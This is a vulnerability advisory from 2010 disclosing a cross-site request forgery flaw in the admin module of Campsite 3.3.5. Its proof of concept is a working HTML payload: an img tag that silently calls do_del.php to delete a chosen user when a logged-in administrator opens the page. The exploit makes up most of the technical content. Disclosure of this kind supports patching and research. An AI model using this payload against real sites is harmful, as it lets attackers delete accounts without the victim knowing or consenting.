Campsite 3.3.5 cross site request forgery vulnerability

2010.03.11

Credit: Pratul Agrawal

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

 =======================================================================
campsite 3.3.5 CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Category CMS / Portals
# Site p4ge http://campsite-demo.campware.org/admin/login.php
# Plateform php
# Proof of concept #
Targeted URL: http://campsite-demo.campware.org/admin/login.php
Script to delete the Admin user through Cross Site request forgery
. ..................................................................................................................
<html>
<body>
<img src=http://campsite-demo.campware.org/admin/users/do_del.php?User=[userID]&uType=Staff />
</body>
</html>
. ..................................................................................................................
After execution refresh the page and u can see that user having giving ID get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Campsite 3.3.5 cross site request forgery vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.